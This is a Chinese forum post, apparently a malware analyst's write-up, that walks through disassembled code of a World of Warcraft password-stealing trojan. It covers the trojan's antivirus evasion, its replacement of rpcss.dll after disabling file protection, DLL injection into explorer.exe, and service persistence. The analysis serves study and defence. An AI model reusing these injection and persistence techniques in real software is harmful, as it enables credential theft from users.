魔兽盗号木马Trojan.Win32.OnlineGame.PSW分析
[i=s] 本帖最后由 qiang 于 2010-1-29 11:50 编辑 [/i]【加壳类型】Upack
【调试工具】OD
脱壳后来到入口点,[code]00401000 55 push ebp ; kernel32.GetProcAddress
00401001 8BEC mov ebp, esp
00401003 81EC 300A0000 sub esp, 0A30
00401009 90 nop
0040100A 90 nop
0040100B E8 70010000 call 00401180 关键call 1
00401010 8D85 E8FBFFFF lea eax, dword ptr [ebp-418]
00401016 50 push eax
00401017 E8 74010000 call 00401190 关键call 2
0040101C 83C4 04 add esp, 4
0040101F 8D8D E4FAFFFF lea ecx, dword ptr [ebp-51C]
00401025 . 68 04010000 push 104 ; /BufSize = 104 (260.)
0040102A . 51 push ecx ; |PathBuffer
0040102B . 6A 00 push 0 ; |hModule = NULL
0040102D . FF15 34304000 call dword ptr [403034] ; \GetModuleFileNameA
00401033 . 8D95 E8FBFFFF lea edx, dword ptr [ebp-418]
00401039 . 52 push edx
0040103A . 6A 65 push 65
0040103C . 68 C04C4000 push 00404CC0 ; ASCII "GetName"
00401041 . 6A 00 push 0
00401043 . E8 88010000 call 004011D0
00401048 . 8D85 ECFCFFFF lea eax, dword ptr [ebp-314] 生成文件~358629.~~~
0040104E . 50 push eax
0040104F . 68 A84C4000 push 00404CA8 ; ASCII "system32\t329076.ini"
00401054 . E8 F7020000 call 00401350 字符串连接得到C:\WINDOWS\system32\t329076.ini
00401059 . 68 04204000 push 00402004
0040105E . 8D8D ECFCFFFF lea ecx, dword ptr [ebp-314]
00401064 . 68 A44C4000 push 00404CA4 ; ASCII "9*&"
00401069 . 51 push ecx
0040106A . E8 A1040000 call 00401510 字符处理函数
0040106F . 68 20070000 push 720
00401074 . 8D95 ECFCFFFF lea edx, dword ptr [ebp-314]
0040107A . 68 00404000 push 00404000
0040107F . 52 push edx
00401080 . E8 4B030000 call 004013D0 生成配置文件t329076.ini
00401085 . 8D85 F4FEFFFF lea eax, dword ptr [ebp-10C]
0040108B . 50 push eax
0040108C . 68 944C4000 push 00404C94 ; ASCII "ru9*&ndll32.exe"
00401091 . E8 FA020000 call 00401390
00401096 . 68 04204000 push 00402004
0040109B . 8D8D F4FEFFFF lea ecx, dword ptr [ebp-10C]
004010A1 . 68 A44C4000 push 00404CA4 ; ASCII "9*&"
004010A6 . 51 push ecx
004010A7 . E8 64040000 call 00401510 字符处理函数
004010AC . 83C4 44 add esp, 44
004010AF . 8D95 F0FDFFFF lea edx, dword ptr [ebp-210]
004010B5 . 52 push edx
004010B6 . 68 884C4000 push 00404C88 ; ASCII "t329076.exe"
004010BB . E8 D0020000 call 00401390 字符串连接得到C:\WINDOWS\system32\t329076.exe
004010C0 . 8D85 D0F5FFFF lea eax, dword ptr [ebp-A30]
004010C6 . 50 push eax
004010C7 . 68 804C4000 push 00404C80 ; ASCII "avp.exe"
004010CC . E8 AF010000 call 00401280 建进程快照,
004010D1 . 83C4 10 add esp, 10
004010D4 . 85C0 test eax, eax
004010D6 . 7E 43 jle short 0040111B
004010D8 . 56 push esi
004010D9 . 57 push edi
004010DA . 8D8D F0FDFFFF lea ecx, dword ptr [ebp-210]
004010E0 . 6A 01 push 1 ; /FailIfExists = TRUE
004010E2 . 8D95 F4FEFFFF lea edx, dword ptr [ebp-10C] ; |
004010E8 . 51 push ecx ; |NewFileName
004010E9 . 52 push edx ; |ExistingFileName
004010EA . FF15 38304000 call dword ptr [403038] ; \CopyFileA
004010F0 . 8DBD F0FDFFFF lea edi, dword ptr [ebp-210]
004010F6 . 83C9 FF or ecx, FFFFFFFF
004010F9 . 33C0 xor eax, eax
004010FB . 8D95 F4FEFFFF lea edx, dword ptr [ebp-10C]
00401101 . F2:AE repne scas byte ptr es:[edi]
00401103 . F7D1 not ecx
00401105 . 2BF9 sub edi, ecx
00401107 . 8BC1 mov eax, ecx
00401109 . 8BF7 mov esi, edi
0040110B . 8BFA mov edi, edx
0040110D . C1E9 02 shr ecx, 2
00401110 . F3:A5 rep movs dword ptr es:[edi], dword p>
00401112 . 8BC8 mov ecx, eax
00401114 . 83E1 03 and ecx, 3
00401117 . F3:A4 rep movs byte ptr es:[edi], byte ptr>
00401119 . 5F pop edi
0040111A . 5E pop esi
0040111B > 8B0D 784C4000 mov ecx, dword ptr [404C78]
00401121 . 66:8B15 7C4C400>mov dx, word ptr [404C7C]
00401128 . A0 7E4C4000 mov al, byte ptr [404C7E]
0040112D . 894D F8 mov dword ptr [ebp-8], ecx
00401130 . 66:8955 FC mov word ptr [ebp-4], dx
00401134 . 8D8D E4FAFFFF lea ecx, dword ptr [ebp-51C]
0040113A . 8845 FE mov byte ptr [ebp-2], al
0040113D . 8D95 E8FBFFFF lea edx, dword ptr [ebp-418]
00401143 . 51 push ecx ; /<%s>
00401144 . 8D85 F4FEFFFF lea eax, dword ptr [ebp-10C] ; |
0040114A . 52 push edx ; |<%s>
0040114B . 8D4D F8 lea ecx, dword ptr [ebp-8] ; |
0040114E . 50 push eax ; |<%s>
0040114F . 51 push ecx ; |<%s>
00401150 . 8D95 E0F9FFFF lea edx, dword ptr [ebp-620] ; |
00401156 . 68 644C4000 push 00404C64 ; |Format = "%s %s %s GetName %s"
0040115B . 52 push edx ; |s
0040115C . FF15 60304000 call dword ptr [403060] ; \wsprintfA
00401162 . 83C4 18 add esp, 18
00401165 . 8D85 E0F9FFFF lea eax, dword ptr [ebp-620]
0040116B . 6A 00 push 0 ; /ShowState = SW_HIDE
0040116D . 50 push eax ; |CmdLine
0040116E . FF15 3C304000 call dword ptr [40303C] ; \WinExec 遍历进程,就拷贝C:\system32\rundll32.exe"为同目录下的t329076.exe,并运行t329076.exe,以GetName和病毒路径为参数加载~358629.~~~;否则就直接调用rundll32.exe以同样参数加载~358629.~~~
00401174 . 33C0 xor eax, eax
00401176 . 8BE5 mov esp, ebp
00401178 . 5D pop ebp
00401179 . C2 1000 retn 10 外层结束[/code]进入关键call 1,代码如下:[code]00401180 . 6A 23 push 23
00401182 . 68 C84E4000 push 00404EC8
00401187 . E8 94020000 call 00401420 关键call 3
0040118C . 83C4 08 add esp, 8
0040118F . C3 retn[/code]进入关键call 3,代码如下:[code]00401420 /$ 81EC 0C020000 sub esp, 20C
00401426 |. 8B8424 14020000 mov eax, dword ptr [esp+214]
0040142D |. 53 push ebx
0040142E |. 55 push ebp
0040142F |. 56 push esi
00401430 |. 85C0 test eax, eax
00401432 |. 57 push edi
00401433 |. C74424 10 00000>mov dword ptr [esp+10], 0
0040143B |. 0F8E B0000000 jle 004014F1
00401441 |. 8B8424 20020000 mov eax, dword ptr [esp+220]
00401448 |. 8B1D 08304000 mov ebx, dword ptr [403008] ; kernel32.lstrcpyA
0040144E |. 8B2D 00304000 mov ebp, dword ptr [403000] ; kernel32.GetProcAddress
00401454 |. 8D78 08 lea edi, dword ptr [eax+8]
00401457 |> 8B4F F8 /mov ecx, dword ptr [edi-8]
0040145A |. 8D5424 14 |lea edx, dword ptr [esp+14]
0040145E |. 51 |push ecx
0040145F |. 52 |push edx
00401460 |. FFD3 |call ebx
00401462 |. 68 04204000 |push 00402004
00401467 |. 8D4424 18 |lea eax, dword ptr [esp+18]
0040146B |. 68 A44C4000 |push 00404CA4 ; ASCII "9*&"
00401470 |. 50 |push eax
00401471 |. E8 9A000000 |call 00401510
00401476 |. 83C4 0C |add esp, 0C
00401479 |. 8D4C24 14 |lea ecx, dword ptr [esp+14]
0040147D |. 51 |push ecx ; /pModule
0040147E |. FF15 10304000 |call dword ptr [403010] ; \GetModuleHandleA/获得kernel32.DLL模块地址
00401484 |. 8BF0 |mov esi, eax
00401486 |. 85F6 |test esi, esi
00401488 |. 75 11 |jnz short 0040149B
0040148A |. 8D5424 14 |lea edx, dword ptr [esp+14]
0040148E |. 52 |push edx ; /FileName
0040148F |. FF15 04304000 |call dword ptr [403004] ; \LoadLibraryA kernel32.DLL
00401495 |. 8BF0 |mov esi, eax
00401497 |. 85F6 |test esi, esi
00401499 |. 74 66 |je short 00401501
0040149B |> 8B47 FC |mov eax, dword ptr [edi-4]
0040149E |. 8D8C24 18010000 |lea ecx, dword ptr [esp+118]
004014A5 |. 50 |push eax
004014A6 |. 51 |push ecx
004014A7 |. FFD3 |call ebx
004014A9 |. 68 04204000 |push 00402004
004014AE |. 8D9424 1C010000 |lea edx, dword ptr [esp+11C]
004014B5 |. 68 A44C4000 |push 00404CA4 ; ASCII "9*&"
004014BA |. 52 |push edx
004014BB |. E8 50000000 |call 00401510 //字符处理获得API函数名
004014C0 |. 83C4 0C |add esp, 0C
004014C3 |. 8D8424 18010000 |lea eax, dword ptr [esp+118]
004014CA |. 50 |push eax
004014CB |. 56 |push esi
004014CC |. FFD5 |call ebp kernel32.GetProcAddress 获取API函数地址
004014CE |. 85C0 |test eax, eax
004014D0 |. 74 2F |je short 00401501
004014D2 |. 8B0F |mov ecx, dword ptr [edi]
004014D4 |. 83C7 0C |add edi, 0C
004014D7 |. 8901 |mov dword ptr [ecx], eax 把API函数地址保存到[ecx]地址
004014D9 |. 8B4424 10 |mov eax, dword ptr [esp+10]
004014DD |. 8B8C24 24020000 |mov ecx, dword ptr [esp+224]
004014E4 |. 40 |inc eax eax是API函数个数,比较是不是左右函数地址都获取了
004014E5 |. 3BC1 |cmp eax, ecx
004014E7 |. 894424 10 |mov dword ptr [esp+10], eax
004014EB |.^ 0F8C 66FFFFFF \jl 00401457 循环获取API地址,获取完所有函数地址往下
004014F1 |> 5F pop edi
004014F2 |. 5E pop esi
004014F3 |. 5D pop ebp
004014F4 |. B8 01000000 mov eax, 1
004014F9 |. 5B pop ebx
004014FA |. 81C4 0C020000 add esp, 20C
00401500 |. C3 retn
00401501 |> 5F pop edi
00401502 |. 5E pop esi
00401503 |. 5D pop ebp
00401504 |. 33C0 xor eax, eax
00401506 |. 5B pop ebx
00401507 |. 81C4 0C020000 add esp, 20C
0040150D \. C3 retn[/code]进入关键call 2,代码如下:[code]00401190 . 81EC 04010000 sub esp, 104
00401196 . 8D4424 00 lea eax, dword ptr [esp]
0040119A . 50 push eax ; /Buffer
0040119B . 68 04010000 push 104 ; |BufSize = 104 (260.)
004011A0 . FF15 30304000 call dword ptr [403030] ; \GetTempPathA
004011A6 . FF15 2C304000 call dword ptr [40302C] ; [GetTickCount
004011AC . 8B9424 08010000 mov edx, dword ptr [esp+108]
004011B3 . 8D4C24 00 lea ecx, dword ptr [esp]
004011B7 . 50 push eax ; /<%06x>
004011B8 . 51 push ecx ; |<%s>
004011B9 . 68 58534000 push 00405358 ; |Format = "%s~%06x.~~~"
004011BE . 52 push edx ; |s
004011BF . FF15 60304000 call dword ptr [403060] ; \wsprintfA连接字符串得到C:\DOCUME~1\safe\LOCALS~1\Temp\~358629.~~~
004011C5 . 81C4 14010000 add esp, 114
004011CB . C3 retn[/code]~0452d3.~~~,这里分析下导出函数GetName函数
用OD打开文件,进程:rundll32.exe
参数:"C:\Documents and Settings\safe\桌面\~0452d3.~~~" GetName "C:\Documents and Settings\safe\桌面\2.exe"
运行,在导出函数上下断点,在ctrl+F2,在F9执行,断在GetName函数上,就可以调试了。
或者加载了~0452d3.~~~,找到GetName函数处,新建一个EIP[code]10001238 ~>/$ 55 push ebp
10001239 |. 8BEC mov ebp, esp
1000123B |. 81EC 20080000 sub esp, 820
10001241 |. 8A15 202A0110 mov dl, byte ptr [10012A20]
10001247 |. 53 push ebx
10001248 |. 56 push esi
10001249 |. 57 push edi
1000124A |. 6A 40 push 40
1000124C |. 33C0 xor eax, eax
1000124E |. 59 pop ecx
1000124F |. 8DBD F9FDFFFF lea edi, dword ptr [ebp-207]
10001255 |. 8895 F8FDFFFF mov byte ptr [ebp-208], dl
1000125B |. 6A 40 push 40
1000125D |. F3:AB rep stos dword ptr es:[edi]
1000125F |. 66:AB stos word ptr es:[edi]
10001261 |. AA stos byte ptr es:[edi]
10001262 |. 59 pop ecx
10001263 |. 33C0 xor eax, eax
10001265 |. 8DBD FDFEFFFF lea edi, dword ptr [ebp-103]
1000126B |. 8895 FCFEFFFF mov byte ptr [ebp-104], dl
10001271 |. F3:AB rep stos dword ptr es:[edi]
10001273 |. 66:AB stos word ptr es:[edi]
10001275 |. AA stos byte ptr es:[edi]
10001276 |. 8D85 F8FDFFFF lea eax, [local.130]
1000127C |. 50 push eax
1000127D |. 68 C0500110 push 100150C0 ; t3rpcss.dll
10001282 |. E8 C0070000 call 10001A47 字符串连接函数
10001287 |. 59 pop ecx
10001288 |. 8D85 F8FDFFFF lea eax, [local.130]
1000128E |. 59 pop ecx
1000128F |. 50 push eax
10001290 |. FF15 342A0110 call dword ptr [10012A34] ; shlwapi.PathFileExistsA
10001296 |. 85C0 test eax, eax
10001298 |. BB 202A0110 mov ebx, 10012A20
1000129D |. 0F85 93000000 jnz 10001336
100012A3 |. 8D85 FCFEFFFF lea eax, [local.65]
100012A9 |. 50 push eax
100012AA |. 68 B0500110 push 100150B0 ; rpc9*&ss.dll
100012AF |. E8 93070000 call 10001A47
100012B4 |. 53 push ebx
100012B5 |. 8D85 FCFEFFFF lea eax, [local.65]
100012BB |. 68 10500110 push 10015010 ; 9*&expl9*&orer.exet3svchos9*&t.exe
100012C0 |. 50 push eax
100012C1 |. E8 E6090000 call 10001CAC
100012C6 |. 8D85 FCFEFFFF lea eax, [local.65]
100012CC |. 50 push eax
100012CD |. E8 CB020000 call 1000159D 调用sfc_os.#5去掉"C:\system32\rpcss.dll"系统保护,
100012D2 |. 8D85 F4FCFFFF lea eax, [local.195]
100012D8 |. 50 push eax
100012D9 |. 68 88500110 push 10015088 ; ..\ServicePackFiles\i386\rpc9*&ss.dll
100012DE |. E8 64070000 call 10001A47
100012E3 |. 53 push ebx ; /s2
100012E4 |. 53 push ebx ; |s1
100012E5 |. E8 4E0C0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
100012EA |. 8B35 80400110 mov esi, dword ptr [<&KERNEL32.Delet>; kernel32.DeleteFileA
100012F0 |. 83C4 28 add esp, 28
100012F3 |. 8D85 F4FCFFFF lea eax, [local.195]
100012F9 |. 50 push eax ; /FileName
100012FA |. FFD6 call esi ; \DeleteFileA删除文件..\ServicePackFiles\i386\rpcss.dll
100012FC |. 8D85 F4FCFFFF lea eax, [local.195]
10001302 |. 50 push eax
10001303 |. 68 70500110 push 10015070 ; dllcache\rpc9*&ss.dll
10001308 |. E8 3A070000 call 10001A47
1000130D |. 53 push ebx ; /s2
1000130E |. 53 push ebx ; |s1
1000130F |. E8 240C0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
10001314 |. 83C4 10 add esp, 10
10001317 |. 8D85 F4FCFFFF lea eax, [local.195]
1000131D |. 50 push eax
1000131E |. FFD6 call esi
10001320 |. 8D85 F8FDFFFF lea eax, [local.130]
10001326 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
10001328 |. 50 push eax ; |NewName
10001329 |. 8D85 FCFEFFFF lea eax, [local.65] ; |
1000132F |. 50 push eax ; |ExistingName
10001330 |. FF15 84400110 call dword ptr [<&KERNEL32.MoveFileE>; \MoveFileExA//拷贝"C:\system32\rpcss.dll"为同目录下的t3rpcss.dll
10001336 |> 8D85 FCFEFFFF lea eax, [local.65]
1000133C |. 6A 01 push 1 ; /FailIfExists = TRUE
1000133E |. 50 push eax ; |NewFileName
1000133F |. 68 0C210010 push 1000210C ; |ExistingFileName ="C:\Documents and Settings\safe\桌面\~0452d3.~~~"
10001344 |. FF15 88400110 call dword ptr [<&KERNEL32.CopyFileA>; \CopyFileA//拷贝~358629.~~~为rpcss.dll
1000134A |. 8D85 F8FDFFFF lea eax, [local.130]
10001350 |. 50 push eax
10001351 |. 8D85 FCFEFFFF lea eax, [local.65]
10001357 |. 50 push eax
10001358 |. E8 6D0A0000 call 10001DCA //获取rpcss.dll的创建时间,设施t3rpcss.dll的创建时间为rpcss.dll的创建时间
1000135D |. 8D85 FCFEFFFF lea eax, [local.65]
10001363 |. 50 push eax
10001364 |. 68 3C500110 push 1001503C ; system32\t329076.dll
10001369 |. E8 81060000 call 100019EF 字符处理,这里获得C:\system32\t329076.dll
1000136E |. 53 push ebx
1000136F |. 8D85 FCFEFFFF lea eax, [local.65]
10001375 |. 68 10500110 push 10015010 ; 9*&expl9*&orer.exet3svchos9*&t.exe
1000137A |. 50 push eax
1000137B |. E8 2C090000 call 10001CAC
10001380 |. 8D85 FCFEFFFF lea eax, [local.65]
10001386 |. 50 push eax
10001387 |. 6A 65 push 65
10001389 |. 68 38500110 push 10015038 ; BINsystem32\t329076.dll
1000138E |. FF35 04200010 push dword ptr [10002004]
10001394 |. E8 E0000000 call 10001479 获取自身资源,生成C:\system32\t329076.dll文件,文件数据经过加密处理
10001399 |. BE 14500110 mov esi, 10015014 ; expl9*&orer.exet3svchos9*&t.exe
1000139E |. 8DBD F0FBFFFF lea edi, [local.260]
100013A4 |. A5 movs dword ptr es:[edi], dword ptr [>
100013A5 |. A5 movs dword ptr es:[edi], dword ptr [>
100013A6 |. A5 movs dword ptr es:[edi], dword ptr [>
100013A7 |. A5 movs dword ptr es:[edi], dword ptr [>
100013A8 |. 6A 3D push 3D
100013AA |. 33C0 xor eax, eax
100013AC |. 59 pop ecx
100013AD |. 8DBD 00FCFFFF lea edi, [local.256]
100013B3 |. F3:AB rep stos dword ptr es:[edi]
100013B5 |. 53 push ebx
100013B6 |. 8D85 F0FBFFFF lea eax, [local.260]
100013BC |. 68 10500110 push 10015010 ; 9*&expl9*&orer.exet3svchos9*&t.exe
100013C1 |. 50 push eax
100013C2 |. E8 E5080000 call 10001CAC
100013C7 |. 8D85 E0F7FFFF lea eax, [local.520]
100013CD |. 50 push eax
100013CE |. 8D85 F0FBFFFF lea eax, [local.260]
100013D4 |. 50 push eax
100013D5 |. E8 67030000 call 10001741 建进程快照,找到explorer.exe的PID
100013DA |. 83C4 40 add esp, 40
100013DD |. 85C0 test eax, eax
100013DF |. 7E 44 jle short 10001425
100013E1 |. FFB5 E0F7FFFF push [local.520] ; /<%d>
100013E7 |. 8D85 F8FDFFFF lea eax, [local.130] ; |
100013ED |. 68 08500110 push 10015008 ; |t3290769*&expl9*&orer.exet3svchos9*&t.exe
100013F2 |. 68 00500110 push 10015000 ; |%s%d
100013F7 |. 50 push eax ; |s
100013F8 |. FF15 C8400110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
100013FE |. 8D85 F8FDFFFF lea eax, [local.130]
10001404 |. 50 push eax
10001405 |. E8 46020000 call 10001650
1000140A |. 83C4 14 add esp, 14
1000140D |. 85C0 test eax, eax
1000140F |. 75 14 jnz short 10001425
10001411 |. 8D85 FCFEFFFF lea eax, [local.65]
10001417 |. 50 push eax
10001418 |. FFB5 E0F7FFFF push [local.520]
1000141E |. E8 F4020000 call 10001717 关键call 4
10001423 |. 59 pop ecx
10001424 |. 59 pop ecx
10001425 |> 6A 01 push 1
10001427 |. 5E pop esi
10001428 |> 53 /push ebx ; /s2 = "C:\Documents and Settings\safe\桌面\2.exe""
10001429 |. 53 |push ebx ; |s1
1000142A |. E8 090B0000 |call <jmp.&MSVCRT.strcmp> ; \strcmp
1000142F |. 59 |pop ecx
10001430 |. 59 |pop ecx
10001431 |. FF75 10 |push [arg.3] ; /FileName
10001434 |. FF15 80400110 |call dword ptr [<&KERNEL32.DeleteFi>; \DeleteFileA删除病毒主体文件
1000143A |. 53 |push ebx ; /s2
1000143B |. 53 |push ebx ; |s1
1000143C |. E8 F70A0000 |call <jmp.&MSVCRT.strcmp> ; \strcmp
10001441 |. 59 |pop ecx
10001442 |. 59 |pop ecx
10001443 |. FF75 10 |push [arg.3]
10001446 |. FF15 342A0110 |call dword ptr [10012A34]
1000144C |. 85C0 |test eax, eax
1000144E |. 74 13 |je short 10001463 如果文件删除掉了就退出
10001450 |. 68 C8000000 |push 0C8 ; /Timeout = 200. ms
10001455 |. FF15 98400110 |call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
1000145B |. 8BC6 |mov eax, esi
1000145D |. 46 |inc esi
1000145E |. 83F8 14 |cmp eax, 14
10001461 |.^ 7C C5 \jl short 10001428
10001463 |> 5F pop edi
10001464 |. 5E pop esi
10001465 |. 5B pop ebx
10001466 |. C9 leave
10001467 \. C2 1000 retn 10[/code]进入关键call 4,代码如下:[code]10001717 /$ 56 push esi
10001718 |. FF7424 08 push dword ptr [esp+8]
1000171C |. 6A 00 push 0 打开方式
1000171E |. 6A 2A push 2A 进程ID
10001720 |. FF15 9C2A0110 call dword ptr [10012A9C] kernel32.OpenProcess 打开explorer.exe
10001726 |. 8BF0 mov esi, eax
10001728 |. 85F6 test esi, esi
1000172A |. 74 13 je short 1000173F
1000172C |. FF7424 0C push dword ptr [esp+C]
10001730 |. 56 push esi
10001731 |. E8 56FFFFFF call 1000168C 关键call 5,在explorer.exe进程中创建远程线程
10001736 |. 59 pop ecx
10001737 |. 59 pop ecx
10001738 |. 56 push esi
10001739 |. FF15 982A0110 call dword ptr [10012A98] ; kernel32.CloseHandle 关闭句柄
1000173F |> 5E pop esi
10001740 \. C3 retn[/code]进入关键call 5,代码如下:[code]1000168C /$ 55 push ebp
1000168D |. 8BEC mov ebp, esp
1000168F |. 51 push ecx
10001690 |. 51 push ecx
10001691 |. 53 push ebx
10001692 |. 56 push esi
10001693 |. 57 push edi
10001694 |. FF75 0C push [arg.2] ; /String
10001697 |. FF15 24400110 call dword ptr [<&KERNEL32.lstrlenA>>; \lstrlenA
1000169D |. 8B5D 08 mov ebx, [arg.1]
100016A0 |. 8BF0 mov esi, eax
100016A2 |. 46 inc esi
100016A3 |. 6A 40 push 40 ; /flProtect = 40 (64.)
100016A5 |. 68 00100000 push 1000 ; |flAllocationType = 1000 (4096.)
100016AA |. 56 push esi ; |dwSize
100016AB |. 6A 00 push 0 ; |lpAddress = NULL
100016AD |. 53 push ebx ; |hProcess
100016AE |. FF15 40400110 call dword ptr [<&KERNEL32.VirtualAl>; \VirtualAllocEx//在E8进程句柄,这里是explorer.exe进程,申请20个字节内存块
100016B4 |. 8BF8 mov edi, eax
100016B6 |. 85FF test edi, edi
100016B8 |. 74 3B je short 100016F5
100016BA |. 8D45 FC lea eax, [local.1]
100016BD |. 50 push eax
100016BE |. 56 push esi
100016BF |. FF75 0C push [arg.2]
100016C2 |. 57 push edi
100016C3 |. 53 push ebx
100016C4 |. FF15 842A0110 call dword ptr [10012A84] ; kernel32.WriteProcessMemory //往申请的内存块里写进C:\WINDOWS\system32\t329076.dll字符串
100016CA |. 85C0 test eax, eax
100016CC |. 74 27 je short 100016F5
100016CE |. 8D45 F8 lea eax, [local.2]
100016D1 |. 50 push eax
100016D2 |. 33C0 xor eax, eax
100016D4 |. 50 push eax
100016D5 |. 57 push edi
100016D6 |. FF35 2C400110 push dword ptr [<&KERNEL32.LoadLibra>; kernel32.LoadLibraryA
100016DC |. 50 push eax
100016DD |. 50 push eax
100016DE |. 53 push ebx
100016DF |. FF15 A82A0110 call dword ptr [10012AA8]
100016E5 |. 85C0 test eax, eax
100016E7 |. 8945 0C mov [arg.2], eax
100016EA |. 74 09 je short 100016F5
100016EC |. 6A FF push -1 ; /Timeout = INFINITE
100016EE |. 50 push eax ; |hObject
100016EF |. FF15 3C400110 call dword ptr [<&KERNEL32.WaitForSi>; \WaitForSingleObject //等待线程结束信号
100016F5 |> 68 00400000 push 4000 ; /dwFreeType = 4000 (16384.)
100016FA |. 56 push esi ; |dwSize
100016FB |. 57 push edi ; |lpAddress
100016FC |. 53 push ebx ; |hProcess
100016FD |. FF15 38400110 call dword ptr [<&KERNEL32.VirtualFr>; \VirtualFreeEx //释放刚才申请的内存块
10001703 |. 837D 0C 00 cmp [arg.2], 0
10001707 |. 5F pop edi
10001708 |. 5E pop esi
10001709 |. 5B pop ebx
1000170A |. 74 09 je short 10001715
1000170C |. FF75 0C push [arg.2]
1000170F |. FF15 982A0110 call dword ptr [10012A98] ; kernel32.CloseHandle
10001715 |> C9 leave
10001716 \. C3 retn[/code]C:\WINDOWS\system32\rpcss.dll分析[code]100010C5 r>/$ 55 push ebp
100010C6 |. 8BEC mov ebp, esp
100010C8 |. 81EC 08020000 sub esp, 208
100010CE |. 837D 0C 01 cmp [arg.2], 1
100010D2 |. 56 push esi
100010D3 |. 57 push edi
100010D4 |. 0F85 55010000 jnz 1000122F
100010DA |. 53 push ebx
100010DB |. E8 8A030000 call 1000146A //获取API函数地址
100010E0 |. 8B45 08 mov eax, [arg.1]
100010E3 |. 8B35 8C400110 mov esi, dword ptr [<&KERNEL32.GetMo>; kernel32.GetModuleFileNameA
100010E9 |. BF 04010000 mov edi, 104
100010EE |. A3 04200010 mov dword ptr [10002004], eax
100010F3 |. 57 push edi ; /BufSize => 104 (260.)
100010F4 |. 68 0C210010 push 1000210C ; |PathBuffer = rpcss.1000210C
100010F9 |. 50 push eax ; |hModule
100010FA |. FFD6 call esi ; \GetModuleFileNameA
100010FC |. BB 08200010 mov ebx, 10002008
10001101 |. 57 push edi ; /BufSize => 104 (260.)
10001102 |. 53 push ebx ; |PathBuffer => rpcss.10002008
10001103 |. 6A 00 push 0 ; |hModule = NULL
10001105 |. FFD6 call esi ; \GetModuleFileNameA
10001107 |. E8 8A090000 call 10001A96 设置自己为"SeDebugPrivilege"权限
1000110C |. BE 60500110 mov esi, 10015060 ; ASCII "svchos9*&t.exe"
10001111 |. 8DBD F8FDFFFF lea edi, [local.130] 把svchos9*&t.exe字符串拷贝到[edi]指向的地址
10001117 |. A5 movs dword ptr es:[edi], dword ptr [>
10001118 |. A5 movs dword ptr es:[edi], dword ptr [>
10001119 |. A5 movs dword ptr es:[edi], dword ptr [>
1000111A |. 66:A5 movs word ptr es:[edi], word ptr [es>
1000111C |. A4 movs byte ptr es:[edi], byte ptr [es>
1000111D |. 6A 3D push 3D
1000111F |. 33C0 xor eax, eax
10001121 |. 59 pop ecx
10001122 |. 8DBD 07FEFFFF lea edi, dword ptr [ebp-1F9]
10001128 |. F3:AB rep stos dword ptr es:[edi]
1000112A |. BE 202A0110 mov esi, 10012A20
1000112F |. AA stos byte ptr es:[edi]
10001130 |. 56 push esi
10001131 |. 8D85 F8FDFFFF lea eax, [local.130]
10001137 |. 68 10500110 push 10015010 ; ASCII "9*&"
1000113C |. 50 push eax
1000113D |. E8 6A0B0000 call 10001CAC 字符处理函数1,除去9*&,这里得到字符串svchost.exe
10001142 |. 83C4 0C add esp, 0C
10001145 |. 8D85 F8FDFFFF lea eax, [local.130]
1000114B |. 50 push eax
1000114C |. 53 push ebx
1000114D |. FF15 302A0110 call dword ptr [10012A30] svchost.exe和当前进程比较,
10001153 |. 85C0 test eax, eax
10001155 |. 5B pop ebx
10001156 |. 0F84 D3000000 je 1000122F 不是svchost.exe进程就跳转结束
1000115C |. A0 202A0110 mov al, byte ptr [10012A20]
10001161 |. 6A 40 push 40
10001163 |. 8885 FCFEFFFF mov byte ptr [ebp-104], al
10001169 |. 59 pop ecx
1000116A |. 33C0 xor eax, eax
1000116C |. 8DBD FDFEFFFF lea edi, dword ptr [ebp-103]
10001172 |. F3:AB rep stos dword ptr es:[edi]
10001174 |. 66:AB stos word ptr es:[edi]
10001176 |. AA stos byte ptr es:[edi]
10001177 |. 8D85 FCFEFFFF lea eax, [local.65]
1000117D |. 50 push eax
1000117E |. 68 54500110 push 10015054 ; ASCII "system32"
10001183 |. E8 67080000 call 100019EF 字符处理函数2
10001188 |. 56 push esi ; /s2
10001189 |. 56 push esi ; |s1
1000118A |. E8 A90D0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
1000118F |. 83C4 10 add esp, 10
10001192 |. 8D85 FCFEFFFF lea eax, [local.65]
10001198 |. 50 push eax
10001199 |. FF15 E0400110 call dword ptr [<&imagehlp.MakeSureD>; imagehlp.MakeSureDirectoryPathExists
1000119F |. 56 push esi ; /s2
100011A0 |. 56 push esi ; |s1
100011A1 |. E8 920D0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
100011A6 |. 8D85 FCFEFFFF lea eax, [local.65]
100011AC |. 50 push eax
100011AD |. 68 3C500110 push 1001503C ; ASCII "system32\t329076.dll"
100011B2 |. E8 38080000 call 100019EF
100011B7 |. 56 push esi
100011B8 |. 8D85 FCFEFFFF lea eax, [local.65]
100011BE |. 68 10500110 push 10015010 ; ASCII "9*&"
100011C3 |. 50 push eax
100011C4 |. E8 E30A0000 call 10001CAC
100011C9 |. 8D85 FCFEFFFF lea eax, [local.65]
100011CF |. 50 push eax
100011D0 |. 6A 65 push 65
100011D2 |. 68 38500110 push 10015038 ; ASCII "BIN"
100011D7 |. FF35 04200010 push dword ptr [10002004]
100011DD |. E8 97020000 call 10001479 获取自身资源信息,生成文件t329076.dll
100011E2 |. BF 24500110 mov edi, 10015024 ; ASCII "t3svchos9*&t.exe"
100011E7 |. 57 push edi
100011E8 |. E8 63040000 call 10001650 创建一个互斥量
100011ED |. 83C4 30 add esp, 30
100011F0 |. 85C0 test eax, eax
100011F2 |. 75 3B jnz short 1000122F
100011F4 |. 57 push edi
100011F5 |. 33FF xor edi, edi
100011F7 |. 6A 01 push 1
100011F9 |. 57 push edi
100011FA |. E8 E50C0000 call 10001EE4
100011FF |. A3 00200010 mov dword ptr [10002000], eax
10001204 |. E8 760C0000 call 10001E7F
10001209 |. E8 1C090000 call 10001B2A 写入注册表项,创建一个Rpcss服务,数据:%SystemRoot%\system32\rpcss.dll
1000120E |. 56 push esi ; /s2
1000120F |. 56 push esi ; |s1
10001210 |. E8 230D0000 call <jmp.&MSVCRT.strcmp> ; \strcmp
10001215 |. 57 push edi ; /pID
10001216 |. 57 push edi ; |flags
10001217 |. 57 push edi ; |arg
10001218 |. 68 00100010 push 10001000 ; |start = rpcss.10001000
1000121D |. 57 push edi ; |stksize
